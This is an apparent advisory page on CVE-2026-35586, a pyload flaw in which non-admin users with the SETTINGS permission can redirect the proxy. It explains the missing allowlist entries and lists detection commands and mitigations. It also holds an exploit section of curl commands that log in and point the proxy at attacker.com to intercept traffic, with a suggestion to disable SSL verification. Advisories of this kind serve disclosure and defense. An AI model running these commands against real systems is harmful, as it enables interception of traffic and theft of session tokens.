pyload, Insecure Allowlist Bypass, CVE-2026-35586 (Critical)

By /

Listen to this Post

How CVE-2026-35586 works:

The `set_config_value()` API (guarded by Perms.SETTINGS) uses a hand-maintained allowlist `ADMIN_ONLY_CORE_OPTIONS` to restrict sensitive core settings. This allowlist includes `(“proxy”, “username”)` and `(“proxy”, “password”)` – but misses ("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), and ("proxy", "type"). Any authenticated non-admin user with the `SETTINGS` permission can therefore call `setConfigValue` to enable proxying and redirect all outbound traffic to an attacker-controlled host. The proxy configuration is read from `src/pyload/core/network/request_factory.py:82-100` and applied to every new pycurl handle in `http_request.py` (lines 211–230) without requiring a restart. Because the attacker controls the proxy endpoint, the gated proxy credentials are irrelevant. This creates a full MitM: every download, captcha fetch, update check, and plugin HTTP call is routed through the attacker, who can steal tokens, inject responses, and chain with `general.ssl_verify=off` (also settable by the same permission) to bypass HTTPS verification.

DailyCVE Form:

Platform: `pyload`
Version: `0.5.x` (all before patch)
Vulnerability: `Proxy redirect via SETTINGS`
Severity: `Critical`
Date: `2026-04-15` (approximate disclosure)

Prediction: `Patch within 2 weeks`

What Undercode Say:

Verify missing allowlist entries
grep -A 20 "ADMIN_ONLY_CORE_OPTIONS" src/pyload/core/api/<strong>init</strong>.py | grep -E "proxy.(enabled|host|port|type)"
Monitor set_config_value calls in logs
grep "setConfigValue.proxy" /var/log/pyload/pyload.log
List users with SETTINGS permission
sqlite3 pyload.db "SELECT FROM users WHERE perms LIKE '%SETTINGS%';"

Exploit:

Login as non-admin SETTINGS user
curl -c cookies.txt -X POST http://target:8000/api/login -d 'username=settings_user&password=pass'
Set malicious proxy
for kv in 'category=proxy&option=enabled&value=True' \
'category=proxy&option=host&value=attacker.com' \
'category=proxy&option=port&value=8080' \
'category=proxy&option=type&value=http'; do
curl -b cookies.txt -X POST http://target:8000/api/setConfigValue -d "$kv§ion=core"
done
Trigger any download, capture full request on attacker.com:8080

Protection from this CVE:

  • Upgrade pyload to version that includes ("proxy","enabled"), ("proxy","host"), ("proxy","port"), `(“proxy”,”type”)` in ADMIN_ONLY_CORE_OPTIONS.
  • Restrict `Perms.SETTINGS` to only trusted admin users.
  • Monitor `setConfigValue` calls for unexpected proxy changes.
  • Outbound firewall rules to block unexpected proxy ports.

Impact:

  • Full interception of all outbound HTTP/HTTPS traffic (URLs, headers, cookies, bodies).
  • Theft of download-site session tokens and bearer tokens.
  • Arbitrary response injection → poisoned archives, malicious captcha solvers, fake updates.
  • Chaining with `general.ssl_verify=off` enables MitM for HTTPS with forged certificates.
  • No restart required; takes effect immediately on next outbound request.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top